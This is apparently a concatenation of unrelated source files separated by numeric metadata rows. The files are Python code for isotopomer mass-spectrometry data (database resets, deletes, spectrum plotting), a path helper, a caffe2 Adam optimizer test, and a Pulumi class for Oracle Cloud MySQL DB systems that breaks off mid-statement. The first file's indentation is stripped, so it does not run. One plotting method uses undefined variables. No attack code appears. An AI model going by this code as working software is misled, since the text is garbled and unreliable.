reset = self.session.query(data_stage01_isotopomer_peakData).filter(data_stage01_isotopomer_peakData.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_normalized).filter(data_stage01_isotopomer_normalized.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_averages).filter(data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_spectrumAccuracy).filter(data_stage01_isotopomer_spectrumAccuracy.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
else:
reset = self.session.query(data_stage01_isotopomer_peakSpectrum).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_peakList).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_peakData).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_normalized).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_averages).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_averagesNormSum).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_spectrumAccuracy).delete(synchronize_session=False);
self.session.commit();
except SQLAlchemyError as e:
print(e);
def reset_datastage01_isotopomer_averages(self,experiment_id_I):
try:
if experiment_id_I:
reset = self.session.query(data_stage01_isotopomer_averages).filter(data_stage01_isotopomer_averages.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_averagesNormSum).filter(data_stage01_isotopomer_averagesNormSum.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
self.session.commit();
except SQLAlchemyError as e:
print(e);
def reset_datastage01_isotopomer_peakData(self,experiment_id_I):
try:
if experiment_id_I:
reset = self.session.query(data_stage01_isotopomer_peakData).filter(data_stage01_isotopomer_peakData.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
self.session.commit();
except SQLAlchemyError as e:
print(e);
def initialize_dataStage01(self):
try:
data_stage01_isotopomer_MQResultsTable.__table__.create(engine,True);
data_stage01_isotopomer_peakSpectrum.__table__.create(engine,True);
data_stage01_isotopomer_peakList.__table__.create(engine,True);
data_stage01_isotopomer_peakData.__table__.create(engine,True);
data_stage01_isotopomer_normalized.__table__.create(engine,True);
data_stage01_isotopomer_averages.__table__.create(engine,True);
data_stage01_isotopomer_averagesNormSum.__table__.create(engine,True);
data_stage01_isotopomer_spectrumAccuracy.__table__.create(engine,True);
except SQLAlchemyError as e:
print(e);
#plotting methods:
def plot_normalizedSpectrum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''plot the normalized spectrum'''
'''Assumptions:
only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
print('plot_normalizedSpectrum...')
plot = matplot();
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Plotting precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_name_abbreviations_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleNameAbbreviation_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Plotting precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Plotting precursor and product spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Plotting precursor and product spectrum for metabolite ' + met);
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
fragment_formulas_lst = [];
if not(replicate_numbers): continue; #no replicates found
for rep in replicate_numbers:
print('Plotting precursor and product spectrum for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
if peakData_I:
fragment_formulas = list(peakData_I.keys());
fragment_formulas_lst.extend(fragment_formulas)
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normMax(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
# plot spectrum data for all replicates and fragments
fragment_formulas_unique = list(set(fragment_formulas_lst));
for fragment in fragment_formulas_unique:
panelLabels = [];
xticklabels = [];
mean = [];
xlabel = 'm/z'
ylabel = 'intensity'
for rep,spectrum in enumerate(peakSpectrum_normalized_lst):
panelLabels_tmp = sna+'_'+met+'_'+fragment+'_'+str(rep+1)
xticklabels_tmp = [];
mean_tmp = [];
if fragment not in spectrum:
print('no spectrum found for fragment ' + fragment);
continue;
for mass,intensity in spectrum[fragment].items():
intensity_tmp = intensity;
if not intensity_tmp: intensity_tmp=0.0
mean_tmp.append(intensity_tmp);
xticklabels_tmp.append(mass);
panelLabels.append(panelLabels_tmp);
xticklabels.append(xticklabels_tmp);
mean.append(mean_tmp);
plot.multiPanelBarPlot('',xticklabels,xlabel,ylabel,panelLabels,mean);
def plot_normalizedSpectrumNormSum(self,experiment_id_I, sample_names_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average normalized intensity for all samples and scan types'''
'''Assumptions:
only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
print('plot_normalizedSpectrumNormSum...')
plot = matplot();
# get time points
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01Normalized(experiment_id_I);
for tp in time_points:
print('Plotting precursor and product spectrum from isotopomer normalized for time-point ' + str(tp));
if sample_names_I:
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for sn in sample_names_I:
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePointAndSampleName_dataStage01Normalized(experiment_id_I,st,tp,sn);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_names_tmp))]);
elif sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
sample_types_lst = ['Unknown' for x in sample_abbreviations];
# query sample types from sample name abbreviations and time-point from data_stage01_isotopomer_normalized
else:
# get sample names and sample name abbreviations
sample_abbreviations = [];
sample_types = ['Unknown','QC'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01Normalized(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Plotting precursor and product spectrum from isotopomer normalized for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01Normalized(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Plotting precursor and product spectrum for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01Normalized( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Plotting precursor and product spectrum for metabolite ' + met);
# get replicates
replicate_numbers = [];
replicate_numbers = self.stage01_isotopomer_query.get_replicateNumbers_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetID_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met);
peakSpectrum_normalized_lst = [];
for rep in replicate_numbers:
print('Plotting precursor and product spectrum for replicate_number ' + str(rep));
#get data
peakData_I = {};
peakData_I = self.stage01_isotopomer_query.get_dataNormalized_experimentIDAndSampleAbbreviationAndTimePointAndScanTypeAndMetIDAndReplicateNumber_dataStage01Normalized( \
experiment_id_I,sna,tp,scan_type,met,rep);
fragment_formulas = list(peakData_I.keys());
peakSpectrum_corrected, peakSpectrum_normalized = self.extract_peakList_normSum(\
peakData_I, fragment_formulas, True);
peakSpectrum_normalized_lst.append(peakSpectrum_normalized);
# plot spectrum data for all replicates and fragments
fragment_formulas_unique = list(set(fragment_formulas_lst));
for fragment in fragment_formulas_unique:
panelLabels = [];
xticklabels = [];
mean = [];
xlabel = 'm/z'
ylabel = 'intensity'
for rep,spectrum in enumerate(peakSpectrum_normalized_lst):
panelLabels_tmp = sna+'_'+met+'_'+fragment+'_'+str(rep+1)
xticklabels_tmp = [];
mean_tmp = [];
for mass,intensity in spectrum[fragment].items():
intensity_tmp = intensity;
if not intensity_tmp: intensity_tmp=0.0
mean_tmp.append(intensity_tmp);
xticklabels_tmp.append(mass);
panelLabels.append(panelLabels_tmp);
xticklabels.append(xticklabels_tmp);
mean.append(mean_tmp);
plot.multiPanelBarPlot('',xticklabels,xlabel,ylabel,panelLabels,mean);
def plot_averageSpectrumNormSum(self,experiment_id_I, time_points_I = None, sample_name_abbreviations_I = None, met_ids_I = None, scan_types_I = None):
'''calculate the average normalized intensity for all samples and scan types'''
'''Assumptions:
only a single fragment:spectrum is used_ per sample name abbreviation, time-point, replicate, scan_type
(i.e. there are no multiple dilutions of the same precursor:spectrum that are used_)
'''
print('plot_averagesNormSum...')
plot = matplot();
# get time points
if time_points_I:
time_points = time_points_I;
else:
time_points = [];
time_points = self.stage01_isotopomer_query.get_timePoint_experimentID_dataStage01AveragesNormSum(experiment_id_I);
for tp in time_points:
print('Plotting product and precursor for time-point ' + str(tp));
# get sample names and sample name abbreviations
if sample_name_abbreviations_I:
sample_abbreviations = sample_name_abbreviations_I;
sample_types_lst = ['Unknown' for x in sample_abbreviations];
else:
sample_abbreviations = [];
sample_types = ['Unknown'];
sample_types_lst = [];
for st in sample_types:
sample_abbreviations_tmp = [];
sample_abbreviations_tmp = self.stage01_isotopomer_query.get_sampleNameAbbreviations_experimentIDAndSampleTypeAndTimePoint_dataStage01AveragesNormSum(experiment_id_I,st,tp);
sample_abbreviations.extend(sample_abbreviations_tmp);
sample_types_lst.extend([st for i in range(len(sample_abbreviations_tmp))]);
for sna_cnt,sna in enumerate(sample_abbreviations):
print('Plotting product and precursor for sample name abbreviation ' + sna);
# get the scan_types
if scan_types_I:
scan_types = [];
scan_types_tmp = [];
scan_types_tmp = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
scan_types = [st for st in scan_types_tmp if st in scan_types_I];
else:
scan_types = [];
scan_types = self.stage01_isotopomer_query.get_scanTypes_experimentIDAndTimePointAndSampleAbbreviationsAndSampleType_dataStage01AveragesNormSum(experiment_id_I,tp,sna,sample_types_lst[sna_cnt]);
for scan_type in scan_types:
print('Plotting product and precursor for scan type ' + scan_type)
# met_ids
if not met_ids_I:
met_ids = [];
met_ids = self.stage01_isotopomer_query.get_metIDs_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanType_dataStage01AveragesNormSum( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type);
else:
met_ids = met_ids_I;
if not(met_ids): continue #no component information was found
for met in met_ids:
print('Plotting product and precursor for metabolite ' + met);
# fragments
fragment_formulas = [];
fragment_formulas = self.stage01_isotopomer_query.get_fragmentFormula_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetID_dataStage01AveragesNormSum( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met);
for frag in fragment_formulas:
print('Plotting product and precursor for fragment ' + frag);
# data
data_mat = [];
data_mat_cv = [];
data_masses = [];
data_mat,data_mat_cv,data_masses = self.stage01_isotopomer_query.get_spectrum_experimentIDAndSampleAbbreviationAndTimePointAndSampleTypeAndScanTypeAndMetIDAndFragmentFormula_dataStage01AveragesNormSum( \
experiment_id_I,sna,tp,sample_types_lst[sna_cnt],scan_type,met,frag);
data_stdev = [];
for i,d in enumerate(data_mat):
stdev = 0.0;
stderr = 0.0;
if data_mat_cv[i]:
stdev = data_mat[i]*data_mat_cv[i]/100;
data_stdev.append(stdev);
title = sna+'_'+met+'_'+frag;
plot.barPlot(title,data_masses,'intensity','m/z',data_mat,var_I=None,se_I=data_stdev,add_labels_I=True)
# data_stage01_isotopomer deletes
def execute_deleteExperimentFromMQResultsTable(self,experiment_id_I,sample_types_I = ['Quality Control','Unknown']):
'''delete rows in data_stage01_MQResultsTable by sample name and sample type
(default = Quality Control and Unknown) from the experiment'''
print('deleting rows in data_stage01_MQResultsTable by sample_name and sample_type...');
dataDeletes = [];
# get sample_names
sample_names = [];
for st in sample_types_I:
sample_names_tmp = [];
sample_names_tmp = self.stage01_isotopomer_query.get_allSampleNames_experimentIDAndSampleType(experiment_id_I,st);
sample_names.extend(sample_names_tmp);
for sn in sample_names:
# format into a dictionary list
print('deleting sample_name ' + sn);
dataDeletes.append({'sample_name':sn});
# delete rows based on sample_names
self.stage01_isotopomer_query.delete_row_sampleName(dataDeletes);
| 65.708161
| 375
| 0.569678
| 19,144
| 206,915
| 5.865023
| 0.044818
| 0.037246
| 0.022577
| 0.034271
| 0.832339
| 0.805362
| 0.772301
| 0.747497
| 0.731893
| 0.714241
| 0
| 0.012871
| 0.351888
| 206,915
| 3,148
| 376
| 65.729034
| 0.82439
| 0.149491
| 0
| 0.716251
| 0
| 0
| 0.050857
| 0.005691
| 0.00086
| 0
| 0
| 0.000318
| 0
| 1
| 0.018057
| false
| 0
| 0.003439
| 0
| 0.030095
| 0.043422
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b863a6c45da3cc66b9aafd17380a1b9266d1ca47
| 91
|
py
|
Python
|
pybullet-gym-rocus/pybulletgym_rocus/envs/assets/robots/franka_panda/__init__.py
|
nbfigueroa/RoCUS
|
f1e1a538a2d0d12d307d9a003c4a2d5bcadcb30f
|
[
"MIT"
] | 7
|
2020-11-20T20:45:49.000Z
|
2021-12-14T19:27:20.000Z
|
urdf/franka_panda/__init__.py
|
michaelyeah7/roblax
|
7f1503986fd50c8336b8b9e7bb1d2f4be4e84b08
|
[
"MIT"
] | 1
|
2021-03-03T03:57:21.000Z
|
2021-03-03T03:57:21.000Z
|
urdf/franka_panda/__init__.py
|
michaelyeah7/roblax
|
7f1503986fd50c8336b8b9e7bb1d2f4be4e84b08
|
[
"MIT"
] | 4
|
2020-11-20T17:00:27.000Z
|
2021-04-01T00:53:50.000Z
|
import os
def get_data_path() -> str:
return os.path.join(os.path.dirname(__file__))
| 15.166667
| 50
| 0.703297
| 15
| 91
| 3.866667
| 0.733333
| 0.206897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 91
| 5
| 51
| 18.2
| 0.753247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
b876121bec0578b39db4f9db2727d297283b3a8a
| 3,294
|
py
|
Python
|
venv/Lib/site-packages/caffe2/python/ideep/adam_op_test.py
|
Westlanderz/AI-Plat1
|
1187c22819e5135e8e8189c99b86a93a0d66b8d8
|
[
"MIT"
] | 1
|
2022-01-08T12:30:44.000Z
|
2022-01-08T12:30:44.000Z
|
venv/Lib/site-packages/caffe2/python/ideep/adam_op_test.py
|
Westlanderz/AI-Plat1
|
1187c22819e5135e8e8189c99b86a93a0d66b8d8
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/caffe2/python/ideep/adam_op_test.py
|
Westlanderz/AI-Plat1
|
1187c22819e5135e8e8189c99b86a93a0d66b8d8
|
[
"MIT"
] | null | null | null |
import numpy as np
import hypothesis.strategies as st
import unittest
import caffe2.python.hypothesis_test_util as hu
from caffe2.python import core, workspace
from hypothesis import given
import caffe2.python.ideep_test_util as mu
@unittest.skipIf(not workspace.C.use_mkldnn, "No MKLDNN support.")
class TestAdamOps(hu.HypothesisTestCase):
@given(inputs=hu.tensors(n=4),
ITER=st.integers(min_value=0, max_value=10000),
LR=st.floats(min_value=0.01, max_value=0.99,
allow_nan=False, allow_infinity=False),
beta1=st.floats(min_value=0.01, max_value=0.99,
allow_nan=False, allow_infinity=False),
beta2=st.floats(min_value=0.01, max_value=0.99,
allow_nan=False, allow_infinity=False),
epsilon=st.floats(min_value=0.01, max_value=0.99,
allow_nan=False, allow_infinity=False),
**mu.gcs)
def test_adam(self, inputs, ITER, LR, beta1, beta2, epsilon, gc, dc):
param, mom1, mom2, grad = inputs
ITER = np.array([ITER], dtype=np.int64)
LR = np.array([LR], dtype=np.float32)
mom2 = np.absolute(mom2)
op = core.CreateOperator(
"Adam",
["param", "mom1", "mom2", "grad", "lr", "iter"],
["output_param", "output_mom1", "output_mom2"],
beta1=beta1, beta2=beta2, epsilon=epsilon)
# Iter lives on the CPU
input_device_options = {'iter': hu.cpu_do, 'lr': hu.cpu_do}
self.assertDeviceChecks(
dc, op,
[param, mom1, mom2, grad, LR, ITER],
[0],
input_device_options=input_device_options,
threshold=0.001)
@given(inputs=hu.tensors(n=4),
ITER=st.integers(min_value=0, max_value=10000),
LR=st.floats(min_value=0.01, max_value=0.99,
allow_nan=False, allow_infinity=False),
beta1=st.floats(min_value=0.01, max_value=0.99,
allow_nan=False, allow_infinity=False),
beta2=st.floats(min_value=0.01, max_value=0.99,
allow_nan=False, allow_infinity=False),
epsilon=st.floats(min_value=0.01, max_value=0.99,
allow_nan=False, allow_infinity=False),
**mu.gcs)
def test_adam_output_grad(self, inputs, ITER, LR, beta1, beta2, epsilon, gc, dc):
param, mom1, mom2, grad = inputs
ITER = np.array([ITER], dtype=np.int64)
LR = np.array([LR], dtype=np.float32)
mom2 = np.absolute(mom2)
op = core.CreateOperator(
"Adam",
["param", "mom1", "mom2", "grad", "lr", "iter"],
["output_param", "output_mom1", "output_mom2", "output_grad"],
beta1=beta1, beta2=beta2, epsilon=epsilon)
# Iter lives on the CPU
input_device_options = {'iter': hu.cpu_do, 'lr': hu.cpu_do}
self.assertDeviceChecks(
dc, op,
[param, mom1, mom2, grad, LR, ITER],
[0],
input_device_options=input_device_options,
threshold=0.001)
if __name__ == "__main__":
unittest.main()
| 39.686747
| 86
| 0.566181
| 416
| 3,294
| 4.300481
| 0.199519
| 0.060369
| 0.050307
| 0.071548
| 0.819452
| 0.819452
| 0.819452
| 0.819452
| 0.819452
| 0.819452
| 0
| 0.052308
| 0.30935
| 3,294
| 82
| 87
| 40.170732
| 0.734066
| 0.013054
| 0
| 0.776119
| 0
| 0
| 0.054097
| 0
| 0
| 0
| 0
| 0
| 0.029851
| 1
| 0.029851
| false
| 0
| 0.104478
| 0
| 0.149254
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b88cf46affe5991b9faf2182211229897bc0e825
| 87,210
|
py
|
Python
|
sdk/python/pulumi_oci/mysql/mysql_db_system.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/mysql/mysql_db_system.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/mysql/mysql_db_system.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MysqlDbSystemArgs', 'MysqlDbSystem']
@pulumi.input_type
class MysqlDbSystemArgs:
def __init__(__self__, *,
admin_password: pulumi.Input[str],
admin_username: pulumi.Input[str],
availability_domain: pulumi.Input[str],
compartment_id: pulumi.Input[str],
shape_name: pulumi.Input[str],
subnet_id: pulumi.Input[str],
backup_policy: Optional[pulumi.Input['MysqlDbSystemBackupPolicyArgs']] = None,
configuration_id: Optional[pulumi.Input[str]] = None,
data_storage_size_in_gb: Optional[pulumi.Input[int]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
fault_domain: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
hostname_label: Optional[pulumi.Input[str]] = None,
ip_address: Optional[pulumi.Input[str]] = None,
is_highly_available: Optional[pulumi.Input[bool]] = None,
maintenance: Optional[pulumi.Input['MysqlDbSystemMaintenanceArgs']] = None,
mysql_version: Optional[pulumi.Input[str]] = None,
port: Optional[pulumi.Input[int]] = None,
port_x: Optional[pulumi.Input[int]] = None,
shutdown_type: Optional[pulumi.Input[str]] = None,
source: Optional[pulumi.Input['MysqlDbSystemSourceArgs']] = None,
state: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a MysqlDbSystem resource.
:param pulumi.Input[str] admin_password: The password for the administrative user. The password must be between 8 and 32 characters long, and must contain at least 1 numeric character, 1 lowercase character, 1 uppercase character, and 1 special (nonalphanumeric) character.
:param pulumi.Input[str] admin_username: The username for the administrative user.
:param pulumi.Input[str] availability_domain: The availability domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input[str] compartment_id: The OCID of the compartment.
:param pulumi.Input[str] shape_name: The name of the shape. The shape determines the resources allocated
* CPU cores and memory for VM shapes; CPU cores, memory and storage for non-VM (or bare metal) shapes. To get a list of shapes, use the [ListShapes](https://docs.cloud.oracle.com/iaas/api/#/en/mysql/20190415/ShapeSummary/ListShapes) operation.
:param pulumi.Input[str] subnet_id: The OCID of the subnet the DB System is associated with.
:param pulumi.Input['MysqlDbSystemBackupPolicyArgs'] backup_policy: (Updatable) Backup policy as optionally used for DB System Creation.
:param pulumi.Input[str] configuration_id: The OCID of the Configuration to be used for this DB System.
:param pulumi.Input[int] data_storage_size_in_gb: Initial size of the data volume in GBs that will be created and attached. Keep in mind that this only specifies the size of the database data volume, the log volume for the database will be scaled appropriately with its shape. It is required if you are creating a new database. It cannot be set if you are creating a database from a backup.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Usage of predefined tag keys. These predefined keys are scoped to namespaces. Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] description: (Updatable) User-provided data about the DB System.
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the DB System. It does not have to be unique.
:param pulumi.Input[str] fault_domain: The fault domain on which to deploy the Read/Write endpoint. This defines the preferred primary instance.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair applied without any predefined name, type or scope. Exists for cross-compatibility only. Example: `{"bar-key": "value"}`
:param pulumi.Input[str] hostname_label: The hostname for the primary endpoint of the DB System. Used for DNS.
:param pulumi.Input[str] ip_address: The IP address the DB System is configured to listen on. A private IP address of your choice to assign to the primary endpoint of the DB System. Must be an available IP address within the subnet's CIDR. If you don't specify a value, Oracle automatically assigns a private IP address from the subnet. This should be a "dotted-quad" style IPv4 address.
:param pulumi.Input[bool] is_highly_available: (Updatable) Specifies if the DB System is highly available.
:param pulumi.Input['MysqlDbSystemMaintenanceArgs'] maintenance: (Updatable) The Maintenance Policy for the DB System. `maintenance` and `backup_policy` cannot be updated in the same request.
:param pulumi.Input[str] mysql_version: Name of the MySQL Version in use for the DB System.
:param pulumi.Input[int] port: The port for primary endpoint of the DB System to listen on.
:param pulumi.Input[int] port_x: The TCP network port on which X Plugin listens for connections. This is the X Plugin equivalent of port.
:param pulumi.Input[str] shutdown_type: It is applicable only for stopping a DB System. Could be set to `FAST`, `SLOW` or `IMMEDIATE`. Default value is `FAST`.
:param pulumi.Input['MysqlDbSystemSourceArgs'] source: Parameters detailing how to provision the initial data of the system.
:param pulumi.Input[str] state: (Updatable) The target state for the DB System. Could be set to `ACTIVE` or `INACTIVE`.
"""
pulumi.set(__self__, "admin_password", admin_password)
pulumi.set(__self__, "admin_username", admin_username)
pulumi.set(__self__, "availability_domain", availability_domain)
pulumi.set(__self__, "compartment_id", compartment_id)
pulumi.set(__self__, "shape_name", shape_name)
pulumi.set(__self__, "subnet_id", subnet_id)
if backup_policy is not None:
pulumi.set(__self__, "backup_policy", backup_policy)
if configuration_id is not None:
pulumi.set(__self__, "configuration_id", configuration_id)
if data_storage_size_in_gb is not None:
pulumi.set(__self__, "data_storage_size_in_gb", data_storage_size_in_gb)
if defined_tags is not None:
pulumi.set(__self__, "defined_tags", defined_tags)
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if fault_domain is not None:
pulumi.set(__self__, "fault_domain", fault_domain)
if freeform_tags is not None:
pulumi.set(__self__, "freeform_tags", freeform_tags)
if hostname_label is not None:
pulumi.set(__self__, "hostname_label", hostname_label)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
if is_highly_available is not None:
pulumi.set(__self__, "is_highly_available", is_highly_available)
if maintenance is not None:
pulumi.set(__self__, "maintenance", maintenance)
if mysql_version is not None:
